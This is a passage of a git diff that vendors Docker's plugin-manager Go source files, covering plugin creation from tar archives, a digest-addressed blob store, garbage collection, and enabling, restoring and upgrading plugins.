+	if err != nil {
+		return errors.Wrapf(err, "failed to parse reference %v", options.RepoName)
+	}
+	if _, ok := ref.(reference.Canonical); ok {
+		return errors.Errorf("canonical references are not permitted")
+	}
+	taggedRef := reference.WithDefaultTag(ref)
+	name := taggedRef.String()
+
+	if err := pm.config.Store.validateName(name); err != nil { // fast check, real check is in createPlugin()
+		return err
+	}
+
+	tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs")
+	defer os.RemoveAll(tmpRootFSDir)
+	if err != nil {
+		return errors.Wrap(err, "failed to create temp directory")
+	}
+	var configJSON []byte
+	rootFS := splitConfigRootFSFromTar(tarCtx, &configJSON)
+
+	rootFSBlob, err := pm.blobStore.New()
+	if err != nil {
+		return err
+	}
+	defer rootFSBlob.Close()
+	gzw := gzip.NewWriter(rootFSBlob)
+	layerDigester := digest.Canonical.New()
+	rootFSReader := io.TeeReader(rootFS, io.MultiWriter(gzw, layerDigester.Hash()))
+
+	if err := chrootarchive.Untar(rootFSReader, tmpRootFSDir, nil); err != nil {
+		return err
+	}
+	if err := rootFS.Close(); err != nil {
+		return err
+	}
+
+	if configJSON == nil {
+		return errors.New("config not found")
+	}
+
+	if err := gzw.Close(); err != nil {
+		return errors.Wrap(err, "error closing gzip writer")
+	}
+
+	var config types.PluginConfig
+	if err := json.Unmarshal(configJSON, &config); err != nil {
+		return errors.Wrap(err, "failed to parse config")
+	}
+
+	if err := pm.validateConfig(config); err != nil {
+		return err
+	}
+
+	pm.mu.Lock()
+	defer pm.mu.Unlock()
+
+	rootFSBlobsum, err := rootFSBlob.Commit()
+	if err != nil {
+		return err
+	}
+	defer func() {
+		if err != nil {
+			go pm.GC()
+		}
+	}()
+
+	config.Rootfs = &types.PluginConfigRootfs{
+		Type:    "layers",
+		DiffIds: []string{layerDigester.Digest().String()},
+	}
+
+	configBlob, err := pm.blobStore.New()
+	if err != nil {
+		return err
+	}
+	defer configBlob.Close()
+	if err := json.NewEncoder(configBlob).Encode(config); err != nil {
+		return errors.Wrap(err, "error encoding json config")
+	}
+	configBlobsum, err := configBlob.Commit()
+	if err != nil {
+		return err
+	}
+
+	p, err := pm.createPlugin(name, configBlobsum, []digest.Digest{rootFSBlobsum}, tmpRootFSDir, nil)
+	if err != nil {
+		return err
+	}
+	p.PluginObj.PluginReference = taggedRef.String()
+
+	pm.config.LogPluginEvent(p.PluginObj.ID, name, "create")
+
+	return nil
+}
+
+func (pm *Manager) validateConfig(config types.PluginConfig) error {
+	return nil // TODO:
+}
+
+func splitConfigRootFSFromTar(in io.ReadCloser, config *[]byte) io.ReadCloser {
+	pr, pw := io.Pipe()
+	go func() {
+		tarReader := tar.NewReader(in)
+		tarWriter := tar.NewWriter(pw)
+		defer in.Close()
+
+		hasRootFS := false
+
+		for {
+			hdr, err := tarReader.Next()
+			if err == io.EOF {
+				if !hasRootFS {
+					pw.CloseWithError(errors.Wrap(err, "no rootfs found"))
+					return
+				}
+				// Signals end of archive.
+				tarWriter.Close()
+				pw.Close()
+				return
+			}
+			if err != nil {
+				pw.CloseWithError(errors.Wrap(err, "failed to read from tar"))
+				return
+			}
+
+			content := io.Reader(tarReader)
+			name := path.Clean(hdr.Name)
+			if path.IsAbs(name) {
+				name = name[1:]
+			}
+			if name == configFileName {
+				dt, err := ioutil.ReadAll(content)
+				if err != nil {
+					pw.CloseWithError(errors.Wrapf(err, "failed to read %s", configFileName))
+					return
+				}
+				*config = dt
+			}
+			if parts := strings.Split(name, "/"); len(parts) != 0 && parts[0] == rootFSFileName {
+				hdr.Name = path.Clean(path.Join(parts[1:]...))
+				if hdr.Typeflag == tar.TypeLink && strings.HasPrefix(strings.ToLower(hdr.Linkname), rootFSFileName+"/") {
+					hdr.Linkname = hdr.Linkname[len(rootFSFileName)+1:]
+				}
+				if err := tarWriter.WriteHeader(hdr); err != nil {
+					pw.CloseWithError(errors.Wrap(err, "error writing tar header"))
+					return
+				}
+				if _, err := pools.Copy(tarWriter, content); err != nil {
+					pw.CloseWithError(errors.Wrap(err, "error copying tar data"))
+					return
+				}
+				hasRootFS = true
+			} else {
+				io.Copy(ioutil.Discard, content)
+			}
+		}
+	}()
+	return pr
+}
diff --git a/vendor/github.com/docker/docker/plugin/backend_unsupported.go b/vendor/github.com/docker/docker/plugin/backend_unsupported.go
new file mode 100644
index 0000000000..66e6dab9e8
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/backend_unsupported.go
@@ -0,0 +1,71 @@
+// +build !linux
+
+package plugin
+
+import (
+	"errors"
+	"io"
+	"net/http"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/reference"
+	"golang.org/x/net/context"
+)
+
+var errNotSupported = errors.New("plugins are not supported on this platform")
+
+// Disable deactivates a plugin, which implies that they cannot be used by containers.
+func (pm *Manager) Disable(name string, config *types.PluginDisableConfig) error {
+	return errNotSupported
+}
+
+// Enable activates a plugin, which implies that they are ready to be used by containers.
+func (pm *Manager) Enable(name string, config *types.PluginEnableConfig) error {
+	return errNotSupported
+}
+
+// Inspect examines a plugin config
+func (pm *Manager) Inspect(refOrID string) (tp *types.Plugin, err error) {
+	return nil, errNotSupported
+}
+
+// Privileges pulls a plugin config and computes the privileges required to install it.
+func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHeader http.Header, authConfig *types.AuthConfig) (types.PluginPrivileges, error) {
+	return nil, errNotSupported
+}
+
+// Pull pulls a plugin, check if the correct privileges are provided and install the plugin.
+func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, out io.Writer) error {
+	return errNotSupported
+}
+
+// Upgrade pulls a plugin, check if the correct privileges are provided and install the plugin.
+func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) error {
+	return errNotSupported
+}
+
+// List displays the list of plugins and associated metadata.
+func (pm *Manager) List() ([]types.Plugin, error) {
+	return nil, errNotSupported
+}
+
+// Push pushes a plugin to the store.
+func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header, authConfig *types.AuthConfig, out io.Writer) error {
+	return errNotSupported
+}
+
+// Remove deletes plugin's root directory.
+func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error {
+	return errNotSupported
+}
+
+// Set sets plugin args
+func (pm *Manager) Set(name string, args []string) error {
+	return errNotSupported
+}
+
+// CreateFromContext creates a plugin from the given pluginDir which contains
+// both the rootfs and the config.json and a repoName with optional tag.
+func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, options *types.PluginCreateOptions) error {
+	return errNotSupported
+}
diff --git a/vendor/github.com/docker/docker/plugin/blobstore.go b/vendor/github.com/docker/docker/plugin/blobstore.go
new file mode 100644
index 0000000000..dc9e598e04
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/blobstore.go
@@ -0,0 +1,181 @@
+package plugin
+
+import (
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+)
+
+type blobstore interface {
+	New() (WriteCommitCloser, error)
+	Get(dgst digest.Digest) (io.ReadCloser, error)
+	Size(dgst digest.Digest) (int64, error)
+}
+
+type basicBlobStore struct {
+	path string
+}
+
+func newBasicBlobStore(p string) (*basicBlobStore, error) {
+	tmpdir := filepath.Join(p, "tmp")
+	if err := os.MkdirAll(tmpdir, 0700); err != nil {
+		return nil, errors.Wrapf(err, "failed to mkdir %v", p)
+	}
+	return &basicBlobStore{path: p}, nil
+}
+
+func (b *basicBlobStore) New() (WriteCommitCloser, error) {
+	f, err := ioutil.TempFile(filepath.Join(b.path, "tmp"), ".insertion")
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to create temp file")
+	}
+	return newInsertion(f), nil
+}
+
+func (b *basicBlobStore) Get(dgst digest.Digest) (io.ReadCloser, error) {
+	return os.Open(filepath.Join(b.path, string(dgst.Algorithm()), dgst.Hex()))
+}
+
+func (b *basicBlobStore) Size(dgst digest.Digest) (int64, error) {
+	stat, err := os.Stat(filepath.Join(b.path, string(dgst.Algorithm()), dgst.Hex()))
+	if err != nil {
+		return 0, err
+	}
+	return stat.Size(), nil
+}
+
+func (b *basicBlobStore) gc(whitelist map[digest.Digest]struct{}) {
+	for _, alg := range []string{string(digest.Canonical)} {
+		items, err := ioutil.ReadDir(filepath.Join(b.path, alg))
+		if err != nil {
+			continue
+		}
+		for _, fi := range items {
+			if _, exists := whitelist[digest.Digest(alg+":"+fi.Name())]; !exists {
+				p := filepath.Join(b.path, alg, fi.Name())
+				err := os.RemoveAll(p)
+				logrus.Debugf("cleaned up blob %v: %v", p, err)
+			}
+		}
+	}
+
+}
+
+// WriteCommitCloser defines object that can be committed to blobstore.
+type WriteCommitCloser interface {
+	io.WriteCloser
+	Commit() (digest.Digest, error)
+}
+
+type insertion struct {
+	io.Writer
+	f        *os.File
+	digester digest.Digester
+	closed   bool
+}
+
+func newInsertion(tempFile *os.File) *insertion {
+	digester := digest.Canonical.New()
+	return &insertion{f: tempFile, digester: digester, Writer: io.MultiWriter(tempFile, digester.Hash())}
+}
+
+func (i *insertion) Commit() (digest.Digest, error) {
+	p := i.f.Name()
+	d := filepath.Join(filepath.Join(p, "../../"))
+	i.f.Sync()
+	defer os.RemoveAll(p)
+	if err := i.f.Close(); err != nil {
+		return "", err
+	}
+	i.closed = true
+	dgst := i.digester.Digest()
+	if err := os.MkdirAll(filepath.Join(d, string(dgst.Algorithm())), 0700); err != nil {
+		return "", errors.Wrapf(err, "failed to mkdir %v", d)
+	}
+	if err := os.Rename(p, filepath.Join(d, string(dgst.Algorithm()), dgst.Hex())); err != nil {
+		return "", errors.Wrapf(err, "failed to rename %v", p)
+	}
+	return dgst, nil
+}
+
+func (i *insertion) Close() error {
+	if i.closed {
+		return nil
+	}
+	defer os.RemoveAll(i.f.Name())
+	return i.f.Close()
+}
+
+type downloadManager struct {
+	blobStore    blobstore
+	tmpDir       string
+	blobs        []digest.Digest
+	configDigest digest.Digest
+}
+
+func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) {
+	for _, l := range layers {
+		b, err := dm.blobStore.New()
+		if err != nil {
+			return initialRootFS, nil, err
+		}
+		defer b.Close()
+		rc, _, err := l.Download(ctx, progressOutput)
+		if err != nil {
+			return initialRootFS, nil, errors.Wrap(err, "failed to download")
+		}
+		defer rc.Close()
+		r := io.TeeReader(rc, b)
+		inflatedLayerData, err := archive.DecompressStream(r)
+		if err != nil {
+			return initialRootFS, nil, err
+		}
+		digester := digest.Canonical.New()
+		if _, err := archive.ApplyLayer(dm.tmpDir, io.TeeReader(inflatedLayerData, digester.Hash())); err != nil {
+			return initialRootFS, nil, err
+		}
+		initialRootFS.Append(layer.DiffID(digester.Digest()))
+		d, err := b.Commit()
+		if err != nil {
+			return initialRootFS, nil, err
+		}
+		dm.blobs = append(dm.blobs, d)
+	}
+	return initialRootFS, nil, nil
+}
+
+func (dm *downloadManager) Put(dt []byte) (digest.Digest, error) {
+	b, err := dm.blobStore.New()
+	if err != nil {
+		return "", err
+	}
+	defer b.Close()
+	n, err := b.Write(dt)
+	if err != nil {
+		return "", err
+	}
+	if n != len(dt) {
+		return "", io.ErrShortWrite
+	}
+	d, err := b.Commit()
+	dm.configDigest = d
+	return d, err
+}
+
+func (dm *downloadManager) Get(d digest.Digest) ([]byte, error) {
+	return nil, digest.ErrDigestNotFound
+}
+func (dm *downloadManager) RootFSFromConfig(c []byte) (*image.RootFS, error) {
+	return configToRootFS(c)
+}
diff --git a/vendor/github.com/docker/docker/plugin/defs.go b/vendor/github.com/docker/docker/plugin/defs.go
new file mode 100644
index 0000000000..927f639166
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/defs.go
@@ -0,0 +1,26 @@
+package plugin
+
+import (
+	"sync"
+
+	"github.com/docker/docker/pkg/plugins"
+	"github.com/docker/docker/plugin/v2"
+)
+
+// Store manages the plugin inventory in memory and on-disk
+type Store struct {
+	sync.RWMutex
+	plugins map[string]*v2.Plugin
+	/* handlers are necessary for transition path of legacy plugins
+	 * to the new model. Legacy plugins use Handle() for registering an
+	 * activation callback.*/
+	handlers map[string][]func(string, *plugins.Client)
+}
+
+// NewStore creates a Store.
+func NewStore(libRoot string) *Store {
+	return &Store{
+		plugins:  make(map[string]*v2.Plugin),
+		handlers: make(map[string][]func(string, *plugins.Client)),
+	}
+}
diff --git a/vendor/github.com/docker/docker/plugin/manager.go b/vendor/github.com/docker/docker/plugin/manager.go
new file mode 100644
index 0000000000..f260aa61a7
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/manager.go
@@ -0,0 +1,347 @@
+package plugin
+
+import (
+	"encoding/json"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"reflect"
+	"regexp"
+	"strings"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/plugin/v2"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/pkg/errors"
+)
+
+const configFileName = "config.json"
+const rootFSFileName = "rootfs"
+
+var validFullID = regexp.MustCompile(`^([a-f0-9]{64})$`)
+
+func (pm *Manager) restorePlugin(p *v2.Plugin) error {
+	if p.IsEnabled() {
+		return pm.restore(p)
+	}
+	return nil
+}
+
+type eventLogger func(id, name, action string)
+
+// ManagerConfig defines configuration needed to start new manager.
+type ManagerConfig struct {
+	Store              *Store // remove
+	Executor           libcontainerd.Remote
+	RegistryService    registry.Service
+	LiveRestoreEnabled bool // TODO: remove
+	LogPluginEvent     eventLogger
+	Root               string
+	ExecRoot           string
+}
+
+// Manager controls the plugin subsystem.
+type Manager struct {
+	config           ManagerConfig
+	mu               sync.RWMutex // protects cMap
+	muGC             sync.RWMutex // protects blobstore deletions
+	cMap             map[*v2.Plugin]*controller
+	containerdClient libcontainerd.Client
+	blobStore        *basicBlobStore
+}
+
+// controller represents the manager's control on a plugin.
+type controller struct {
+	restart       bool
+	exitChan      chan bool
+	timeoutInSecs int
+}
+
+// pluginRegistryService ensures that all resolved repositories
+// are of the plugin class.
+type pluginRegistryService struct {
+	registry.Service
+}
+
+func (s pluginRegistryService) ResolveRepository(name reference.Named) (repoInfo *registry.RepositoryInfo, err error) {
+	repoInfo, err = s.Service.ResolveRepository(name)
+	if repoInfo != nil {
+		repoInfo.Class = "plugin"
+	}
+	return
+}
+
+// NewManager returns a new plugin manager.
+func NewManager(config ManagerConfig) (*Manager, error) {
+	if config.RegistryService != nil {
+		config.RegistryService = pluginRegistryService{config.RegistryService}
+	}
+	manager := &Manager{
+		config: config,
+	}
+	if err := os.MkdirAll(manager.config.Root, 0700); err != nil {
+		return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.Root)
+	}
+	if err := os.MkdirAll(manager.config.ExecRoot, 0700); err != nil {
+		return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.ExecRoot)
+	}
+	if err := os.MkdirAll(manager.tmpDir(), 0700); err != nil {
+		return nil, errors.Wrapf(err, "failed to mkdir %v", manager.tmpDir())
+	}
+	var err error
+	manager.containerdClient, err = config.Executor.Client(manager) // todo: move to another struct
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to create containerd client")
+	}
+	manager.blobStore, err = newBasicBlobStore(filepath.Join(manager.config.Root, "storage/blobs"))
+	if err != nil {
+		return nil, err
+	}
+
+	manager.cMap = make(map[*v2.Plugin]*controller)
+	if err := manager.reload(); err != nil {
+		return nil, errors.Wrap(err, "failed to restore plugins")
+	}
+	return manager, nil
+}
+
+func (pm *Manager) tmpDir() string {
+	return filepath.Join(pm.config.Root, "tmp")
+}
+
+// StateChanged updates plugin internals using libcontainerd events.
+func (pm *Manager) StateChanged(id string, e libcontainerd.StateInfo) error {
+	logrus.Debugf("plugin state changed %s %#v", id, e)
+
+	switch e.State {
+	case libcontainerd.StateExit:
+		p, err := pm.config.Store.GetV2Plugin(id)
+		if err != nil {
+			return err
+		}
+
+		pm.mu.RLock()
+		c := pm.cMap[p]
+
+		if c.exitChan != nil {
+			close(c.exitChan)
+		}
+		restart := c.restart
+		pm.mu.RUnlock()
+
+		os.RemoveAll(filepath.Join(pm.config.ExecRoot, id))
+
+		if p.PropagatedMount != "" {
+			if err := mount.Unmount(p.PropagatedMount); err != nil {
+				logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err)
+			}
+			propRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount")
+			if err := mount.Unmount(propRoot); err != nil {
+				logrus.Warn("Could not unmount %s: %v", propRoot, err)
+			}
+		}
+
+		if restart {
+			pm.enable(p, c, true)
+		}
+	}
+
+	return nil
+}
+
+func (pm *Manager) reload() error { // todo: restore
+	dir, err := ioutil.ReadDir(pm.config.Root)
+	if err != nil {
+		return errors.Wrapf(err, "failed to read %v", pm.config.Root)
+	}
+	plugins := make(map[string]*v2.Plugin)
+	for _, v := range dir {
+		if validFullID.MatchString(v.Name()) {
+			p, err := pm.loadPlugin(v.Name())
+			if err != nil {
+				return err
+			}
+			plugins[p.GetID()] = p
+		}
+	}
+
+	pm.config.Store.SetAll(plugins)
+
+	var wg sync.WaitGroup
+	wg.Add(len(plugins))
+	for _, p := range plugins {
+		c := &controller{} // todo: remove this
+		pm.cMap[p] = c
+		go func(p *v2.Plugin) {
+			defer wg.Done()
+			if err := pm.restorePlugin(p); err != nil {
+				logrus.Errorf("failed to restore plugin '%s': %s", p.Name(), err)
+				return
+			}
+
+			if p.Rootfs != "" {
+				p.Rootfs = filepath.Join(pm.config.Root, p.PluginObj.ID, "rootfs")
+			}
+
+			// We should only enable rootfs propagation for certain plugin types that need it.
+			for _, typ := range p.PluginObj.Config.Interface.Types {
+				if (typ.Capability == "volumedriver" || typ.Capability == "graphdriver") && typ.Prefix == "docker" && strings.HasPrefix(typ.Version, "1.") {
+					if p.PluginObj.Config.PropagatedMount != "" {
+						propRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount")
+
+						// check if we need to migrate an older propagated mount from before
+						// these mounts were stored outside the plugin rootfs
+						if _, err := os.Stat(propRoot); os.IsNotExist(err) {
+							if _, err := os.Stat(p.PropagatedMount); err == nil {
+								// make sure nothing is mounted here
+								// don't care about errors
+								mount.Unmount(p.PropagatedMount)
+								if err := os.Rename(p.PropagatedMount, propRoot); err != nil {
+									logrus.WithError(err).WithField("dir", propRoot).Error("error migrating propagated mount storage")
+								}
+								if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil {
+									logrus.WithError(err).WithField("dir", p.PropagatedMount).Error("error migrating propagated mount storage")
+								}
+							}
+						}
+
+						if err := os.MkdirAll(propRoot, 0755); err != nil {
+							logrus.Errorf("failed to create PropagatedMount directory at %s: %v", propRoot, err)
+						}
+						// TODO: sanitize PropagatedMount and prevent breakout
+						p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount)
+						if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil {
+							logrus.Errorf("failed to create PropagatedMount directory at %s: %v", p.PropagatedMount, err)
+							return
+						}
+					}
+				}
+			}
+
+			pm.save(p)
+			requiresManualRestore := !pm.config.LiveRestoreEnabled && p.IsEnabled()
+
+			if requiresManualRestore {
+				// if liveRestore is not enabled, the plugin will be stopped now so we should enable it
+				if err := pm.enable(p, c, true); err != nil {
+					logrus.Errorf("failed to enable plugin '%s': %s", p.Name(), err)
+				}
+			}
+		}(p)
+	}
+	wg.Wait()
+	return nil
+}
+
+func (pm *Manager) loadPlugin(id string) (*v2.Plugin, error) {
+	p := filepath.Join(pm.config.Root, id, configFileName)
+	dt, err := ioutil.ReadFile(p)
+	if err != nil {
+		return nil, errors.Wrapf(err, "error reading %v", p)
+	}
+	var plugin v2.Plugin
+	if err := json.Unmarshal(dt, &plugin); err != nil {
+		return nil, errors.Wrapf(err, "error decoding %v", p)
+	}
+	return &plugin, nil
+}
+
+func (pm *Manager) save(p *v2.Plugin) error {
+	pluginJSON, err := json.Marshal(p)
+	if err != nil {
+		return errors.Wrap(err, "failed to marshal plugin json")
+	}
+	if err := ioutils.AtomicWriteFile(filepath.Join(pm.config.Root, p.GetID(), configFileName), pluginJSON, 0600); err != nil {
+		return errors.Wrap(err, "failed to write atomically plugin json")
+	}
+	return nil
+}
+
+// GC cleans up unrefrenced blobs. This is recommended to run in a goroutine
+func (pm *Manager) GC() {
+	pm.muGC.Lock()
+	defer pm.muGC.Unlock()
+
+	whitelist := make(map[digest.Digest]struct{})
+	for _, p := range pm.config.Store.GetAll() {
+		whitelist[p.Config] = struct{}{}
+		for _, b := range p.Blobsums {
+			whitelist[b] = struct{}{}
+		}
+	}
+
+	pm.blobStore.gc(whitelist)
+}
+
+type logHook struct{ id string }
+
+func (logHook) Levels() []logrus.Level {
+	return logrus.AllLevels
+}
+
+func (l logHook) Fire(entry *logrus.Entry) error {
+	entry.Data = logrus.Fields{"plugin": l.id}
+	return nil
+}
+
+func attachToLog(id string) func(libcontainerd.IOPipe) error {
+	return func(iop libcontainerd.IOPipe) error {
+		iop.Stdin.Close()
+
+		logger := logrus.New()
+		logger.Hooks.Add(logHook{id})
+		// TODO: cache writer per id
+		w := logger.Writer()
+		go func() {
+			io.Copy(w, iop.Stdout)
+		}()
+		go func() {
+			// TODO: update logrus and use logger.WriterLevel
+			io.Copy(w, iop.Stderr)
+		}()
+		return nil
+	}
+}
+
+func validatePrivileges(requiredPrivileges, privileges types.PluginPrivileges) error {
+	// todo: make a better function that doesn't check order
+	if !reflect.DeepEqual(privileges, requiredPrivileges) {
+		return errors.New("incorrect privileges")
+	}
+	return nil
+}
+
+func configToRootFS(c []byte) (*image.RootFS, error) {
+	var pluginConfig types.PluginConfig
+	if err := json.Unmarshal(c, &pluginConfig); err != nil {
+		return nil, err
+	}
+	// validation for empty rootfs is in distribution code
+	if pluginConfig.Rootfs == nil {
+		return nil, nil
+	}
+
+	return rootFSFromPlugin(pluginConfig.Rootfs), nil
+}
+
+func rootFSFromPlugin(pluginfs *types.PluginConfigRootfs) *image.RootFS {
+	rootFS := image.RootFS{
+		Type:    pluginfs.Type,
+		DiffIDs: make([]layer.DiffID, len(pluginfs.DiffIds)),
+	}
+	for i := range pluginfs.DiffIds {
+		rootFS.DiffIDs[i] = layer.DiffID(pluginfs.DiffIds[i])
+	}
+
+	return &rootFS
+}
diff --git a/vendor/github.com/docker/docker/plugin/manager_linux.go b/vendor/github.com/docker/docker/plugin/manager_linux.go
new file mode 100644
index 0000000000..ad66616628
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/manager_linux.go
@@ -0,0 +1,284 @@
+// +build linux
+
+package plugin
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/daemon/initlayer"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/plugins"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/plugin/v2"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+)
+
+func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error {
+	p.Rootfs = filepath.Join(pm.config.Root, p.PluginObj.ID, "rootfs")
+	if p.IsEnabled() && !force {
+		return fmt.Errorf("plugin %s is already enabled", p.Name())
+	}
+	spec, err := p.InitSpec(pm.config.ExecRoot)
+	if err != nil {
+		return err
+	}
+
+	c.restart = true
+	c.exitChan = make(chan bool)
+
+	pm.mu.Lock()
+	pm.cMap[p] = c
+	pm.mu.Unlock()
+
+	var propRoot string
+	if p.PropagatedMount != "" {
+		propRoot = filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount")
+
+		if err := os.MkdirAll(propRoot, 0755); err != nil {
+			logrus.Errorf("failed to create PropagatedMount directory at %s: %v", propRoot, err)
+		}
+
+		if err := mount.MakeRShared(propRoot); err != nil {
+			return errors.Wrap(err, "error setting up propagated mount dir")
+		}
+
+		if err := mount.Mount(propRoot, p.PropagatedMount, "none", "rbind"); err != nil {
+			return errors.Wrap(err, "error creating mount for propagated mount")
+		}
+	}
+
+	if err := initlayer.Setup(filepath.Join(pm.config.Root, p.PluginObj.ID, rootFSFileName), 0, 0); err != nil {
+		return errors.WithStack(err)
+	}
+
+	if err := pm.containerdClient.Create(p.GetID(), "", "", specs.Spec(*spec), attachToLog(p.GetID())); err != nil {
+		if p.PropagatedMount != "" {
+			if err := mount.Unmount(p.PropagatedMount); err != nil {
+				logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err)
+			}
+			if err := mount.Unmount(propRoot); err != nil {
+				logrus.Warnf("Could not unmount %s: %v", propRoot, err)
+			}
+		}
+		return errors.WithStack(err)
+	}
+
+	return pm.pluginPostStart(p, c)
+}
+
+func (pm *Manager) pluginPostStart(p *v2.Plugin, c *controller) error {
+	client, err := plugins.NewClientWithTimeout("unix://"+filepath.Join(pm.config.ExecRoot, p.GetID(), p.GetSocket()), nil, c.timeoutInSecs)
+	if err != nil {
+		c.restart = false
+		shutdownPlugin(p, c, pm.containerdClient)
+		return errors.WithStack(err)
+	}
+
+	p.SetPClient(client)
+	pm.config.Store.SetState(p, true)
+	pm.config.Store.CallHandler(p)
+
+	return pm.save(p)
+}
+
+func (pm *Manager) restore(p *v2.Plugin) error {
+	if err := pm.containerdClient.Restore(p.GetID(), attachToLog(p.GetID())); err != nil {
+		return err
+	}
+
+	if pm.config.LiveRestoreEnabled {
+		c := &controller{}
+		if pids, _ := pm.containerdClient.GetPidsForContainer(p.GetID()); len(pids) == 0 {
+			// plugin is not running, so follow normal startup procedure
+			return pm.enable(p, c, true)
+		}
+
+		c.exitChan = make(chan bool)
+		c.restart = true
+		pm.mu.Lock()
+		pm.cMap[p] = c
+		pm.mu.Unlock()
+		return pm.pluginPostStart(p, c)
+	}
+
+	return nil
+}
+
+func shutdownPlugin(p *v2.Plugin, c *controller, containerdClient libcontainerd.Client) {
+	pluginID := p.GetID()
+
+	err := containerdClient.Signal(pluginID, int(syscall.SIGTERM))
+	if err != nil {
+		logrus.Errorf("Sending SIGTERM to plugin failed with error: %v", err)
+	} else {
+		select {
+		case <-c.exitChan:
+			logrus.Debug("Clean shutdown of plugin")
+		case <-time.After(time.Second * 10):
+			logrus.Debug("Force shutdown plugin")
+			if err := containerdClient.Signal(pluginID, int(syscall.SIGKILL)); err != nil {
+				logrus.Errorf("Sending SIGKILL to plugin failed with error: %v", err)
+			}
+		}
+	}
+}
+
+func (pm *Manager) disable(p *v2.Plugin, c *controller) error {
+	if !p.IsEnabled() {
+		return fmt.Errorf("plugin %s is already disabled", p.Name())
+	}
+
+	c.restart = false
+	shutdownPlugin(p, c, pm.containerdClient)
+	pm.config.Store.SetState(p, false)
+	return pm.save(p)
+}
+
+// Shutdown stops all plugins and called during daemon shutdown.
+func (pm *Manager) Shutdown() {
+	plugins := pm.config.Store.GetAll()
+	for _, p := range plugins {
+		pm.mu.RLock()
+		c := pm.cMap[p]
+		pm.mu.RUnlock()
+
+		if pm.config.LiveRestoreEnabled && p.IsEnabled() {
+			logrus.Debug("Plugin active when liveRestore is set, skipping shutdown")
+			continue
+		}
+		if pm.containerdClient != nil && p.IsEnabled() {
+			c.restart = false
+			shutdownPlugin(p, c, pm.containerdClient)
+		}
+	}
+}
+
+func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobsums []digest.Digest, tmpRootFSDir string, privileges *types.PluginPrivileges) (err error) {
+	config, err := pm.setupNewPlugin(configDigest, blobsums, privileges)
+	if err != nil {
+		return err
+	}
+
+	pdir := filepath.Join(pm.config.Root, p.PluginObj.ID)
+	orig := filepath.Join(pdir, "rootfs")
+	backup := orig + "-old"
+	if err := os.Rename(orig, backup); err != nil {
+		return err
+	}
+
+	defer func() {
+		if err != nil {
+			if rmErr := os.RemoveAll(orig); rmErr != nil && !os.IsNotExist(rmErr) {
+				logrus.WithError(rmErr).WithField("dir", backup).Error("error cleaning up after failed upgrade")
+				return
+			}
+
+			if err := os.Rename(backup, orig); err != nil {
+				err = errors.Wrap(err, "error restoring old plugin root on upgrade failure")
+			}
+			if rmErr := os.RemoveAll(tmpRootFSDir); rmErr != nil && !os.IsNotExist(rmErr) {
+				logrus.WithError(rmErr).WithField("plugin", p.Name()).Errorf("error cleaning up plugin upgrade dir: %s", tmpRootFSDir)
+			}
+		} else {
+			if rmErr := os.RemoveAll(backup); rmErr != nil && !os.IsNotExist(rmErr) {
+				logrus.WithError(rmErr).WithField("dir", backup).Error("error cleaning up old plugin root after successful upgrade")
+			}
+
+			p.Config = configDigest
+			p.Blobsums = blobsums
+		}
+	}()
+
+	if err := os.Rename(tmpRootFSDir, orig); err != nil {
+		return errors.Wrap(err, "error upgrading")
+	}
+
+	p.PluginObj.Config = config
+	err = pm.save(p)
+	return errors.Wrap(err, "error saving upgraded plugin config")
+}
+
